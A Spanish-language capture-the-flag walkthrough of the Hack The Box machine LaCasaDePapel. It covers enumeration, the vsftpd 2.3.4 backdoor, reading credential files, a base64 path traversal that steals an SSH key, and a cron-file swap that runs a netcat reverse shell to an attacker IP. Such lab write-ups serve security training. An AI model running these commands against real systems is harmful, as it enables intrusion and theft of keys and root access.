HTB_LaCasaDePapel
La Casa de Papel {-}
Introduccion {-}
La maquina del dia se llama LaCasaDePapel.
El replay del live se puede ver aqui
No olvideis dejar un like al video y un commentario…
Enumeracion {-}
Reconocimiento de maquina, puertos abiertos y servicios {-}
Ping {-}
ping -c 1 10.10.10.131ttl: 63 -> maquina Linux
Nmap {-}
nmap -p- --open -T5 -v -n 10.10.10.131Va lento
nmap -sS -p- --open --min-rate 5000 -vvv -n -Pn 10.10.10.131 -oG allPorts
extractPorts allPorts
nmap -sC -sV -p21,22,80,443 10.10.10.131 -oN targeted| Puerto | Servicio | Que se nos occure? | Que falta? |
|---|---|---|---|
| 21 | ftp | anonymous | |
| 22 | ssh | Coneccion directa | |
| 80 | http | Web Fuzzing | |
| 443 | https | Web Fuzzing |
Ya aqui podemos ver en el commonName del certificado ssl
lacasadepapel.htb que añadimos al
/etc/hosts Coneccion Anonoymous con ftp {-}
ftp 10.10.10.131
Name: anonymous
Password:
530 Login incorrect.No nos podemos conectar con el usuario anonymous, Pero podemos ver que el servicio es un vsFTPd 2.3.4 que ya sabemos que existe un exploit
searchsploit vsftpd 2.3.4
#Output
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)Analyzando la web {-}
Whatweb {-}
whatweb http://10.10.10.131No vemos nada interesante aqui.
Checkear la web {-}
Si entramos en la url
http://10.10.10.131 , El wappalizer no nos muestra nada. Si entramos con el dominio
http://lacasadepapel.htb vemos lo mismo. Intentamos por https
https://lacasadepapel.htb y aqui la cosa cambia. Tenemos un mensaje que dice que tenemos que proporcionar un certificado cliente para ver mas cosas. Pero aqui necessitamos tener mas informaciones.
Vulnerability Assessment {-}
vsftpd 2.3.4 {-}
Como ya sabemos que esta version es vulnerable, buscando por internet o analyzando el exploit de Metasploit vemos que la vulnerabilidad reside en poner una sonrisita
:) al final del nombre de usuario y esto hace que se habre el puerto 6200 de la maquina.
nc 10.10.10.131 6200
#Output
Ncat: Connection refused.
telnet 10.10.10.131 21
USER s4vitar:)
PASS setensose queda bloqueado, podemos cerrar la ventana y con nc intentamos nuevamente la coneccion al puerto 6200.
nc 10.10.10.131 6200Intentamos enviar commandos
whoami
#Error PHP Warning: Use of undefined constant whoami - assumed 'whoami' (this will throw an Error in a future version of PHP)Intentamos commandos PHP
exec("whoami")
#error
shell_exec("whoami")
#error
passthru("whoami")
#error
system("whoami")
#error
help
#Output
help
ls
dump
doc
show
wtf
...Vemos cosas intentamos con ls ver las variables classes funcciones y mas
ls
#Output
$tokyoMiramos el contenido con show
show $tokyo
#output
class Tokyo {
private function sign($caCert, $userCsr){
...
}
}Aqui vemos la class Tokyo con su funccion private. Podemos ver que en el directorio
/home/nairobi/ca.key hay una key. Como este servicio esta en php, miramos si podemos listar contenido de ficheros con las fucciones php
file_get_contents() ,
scandir() o
readfile() file_get_contents("/etc/passwd")Y podemos ver el
/etc/passwd , miramos si podemos ver la key del usuario nairobi.
miramos si encontramos id_rsa
scandir("/")
scandir("/home")
scandir("/home/berlin/.ssh")
scandir("/home/nairobi/.ssh")
scandir("/home/oslo/.ssh")
scandir("/home/dali/.ssh")
scandir("/home/professor/.ssh")No encontramos nada. Miramos el contenido del fichero key.
readfile("/home/nairobi/ca.key")Ahora que tenemos la key podemos crear un certificado de cliente valido.
Creamos un certificado de cliente valido {-}
-
Tenemos que recuperar el certificado del servidor
openssl s_client -connect 10.10.10.131:443 openssl s_client -connect 10.10.10.131:443 | openssl x509 openssl s_client -connect 10.10.10.131:443 | openssl x509 > ca.cer -
Copiamos el contenido del ca.key en un fichero ca.key
- Aqui tenemos 2 ficheros el ca.key y el ca.cer
-
Con openssl creamos un private key
openssl genrsa -out client.key 4096 -
Creamos un .req
openssl req -new -key client.key -out client.reqen commonName ponemos lacasadepapel.htb en el resto le damos al enter.
-
Firmamos el certificado
openssl x509 -req -in client.req -set_serial 123 -CA ca.cer -CAkey ca.key -days 365 -extensions client -outform PEM -out client.cerAqui ya tenemos un certificado cliente valido. Pero ahora tenemos que convertirlo en un
.p12 para que los navegadores los accepten.
-
Conversion en certificado pkcs12 para navegadores
openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12 chmod 777 client.p12
Aqui ya podemos añadir a firefox el certificado firmado. En firefox vamos a
ajustes y buscamos por
cert . Damos a
Ver certificado y en el menu
Sus certificados le podemos dar a
importar . Importamos el
client.p12 y le damos a acceptar.
Si recargamos la pagina
https://lacasadepapel.htb y acceptamos el certificado, ya podemos ver que el contenido a cambiado y un private arena es visible.
Pathtraversal con base64 {-}
Aqui vemos dos Seasons y si le damos a una vemos unos ficheros
.avi y haciendo hovering bemos que los nombres son en base64. Lo comprobamos con un fichero.
echo 'U0VBU09OLTEvMDMuYXZp' | base64 -d;echo
#Output
SEASON-1/03.aviEn la url vemos que tenemos algo como
https://lacasadepapel.htb/?path=SEASON-1 . Miramos lo que pasa si le damos a
https://lacasadepapel.htb/?path=/etc/passwd y salta un error como no existe el path en
/home/berlin/download//etc/passwd y que usa la funccion scandir para esto. Ya pensamos en un path traversal, pero como es un scandir solo podemos ir a por directorios.
https://lacasadepapel.htb/?path=../aqui vemos el user.txt.
echo -n '../user.txt' | base64
#Output
Li4vdXNlci50eHQ=y si vamos ahora a la url
https://lacasadepapel.htb/file/Li4vdXNlci50eHQ= vemos que podemos descargar el user.txt. Pero a nosotros nos interessa ganar accesso al systema.
En la url
https://lacasadepapel.htb/?path=../ vemos que podemos pinchar al directorio
.ssh y a dentro hay una
id_rsa . Hacemos lo mismos que con el user.txt
Vuln exploit & Gaining Access {-}
SSH {-}
echo -n '../.ssh/id_rsa' | base64
#Output
Li4vLnNzaC9pZF9yc2E=y con la url
https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E= descargamos el fichero id_rsa.
mv /home/s4vitar/Descargas/firefox/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa berlin@10.10.10.131como no va intentamos con los otros usuarios.
ssh -i id_rsa berlin@10.10.10.131
ssh -i id_rsa dali@10.10.10.131
ssh -i id_rsa nairobi@10.10.10.131
ssh -i id_rsa oslo@10.10.10.131
ssh -i id_rsa professor@10.10.10.131Hemos ganado accesso al systema como el usuario professor.
Privilege Escalation {-}
Rootear la maquina {-}
whoami
ls
pwd
find / -name user.txt
cd /home/berlin/user.txtAqui vemos que el user.txt solo se puede ver desde la web.
uname -a
lsb_release
cat /etc/os-release
id
sudo -l
cd /
find \-perm -4000 2>/dev/nullaqui vemos binarios SUID. comprobamos con gtfobins si se pueden burlar.
buscamos por bbsuid, abuild-sudo sudo pero no encontramos nada. Tenemos que mirar de CRON. Lo miramos con pspy.
git clone https://github.com/DominicBreuker/pspy
cd pspy
go build -ldflags "-s -w" main.go
upx main
mv main pspy
python3 -m http.server 80Desde la maquina victima, downloadeamos el fichero y lo lanzamos
wget http://10.10.14.8/pspy
chmod +x pspy
./pspyPodemos ver que hay una tarea ejecutada por root que lanza un
sudo -u nobody /usr/bin/node /home/professor/memcached.js Si vamos al
/home/professor vemos el fichero
memcached.js pero no nos deja ver lo que hay dentro. Hay otro fichero
memcached.ini que contiene el comando ejecutado durante la tarea cron.
Aqui el truco es que aun que el fichero no se puedo modificar, como esta en nuestra carpeta HOME, lo podemos borrar.
rm memcached.ini
vi memcached.ini
[program:memcached]
command = sudo -u root /tmp/pwn.shaqui creamos el pwn.sh
cd /tmp
touch pwn.sh
chmod +x pwn.sh
vi pwn.sh
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.80 443 >/tmp/fnos ponemos en escucha por el puerto 443
nc -nlvp 443Esperamos un poco y ganamos acceso al systema como root y podemos leer la flag.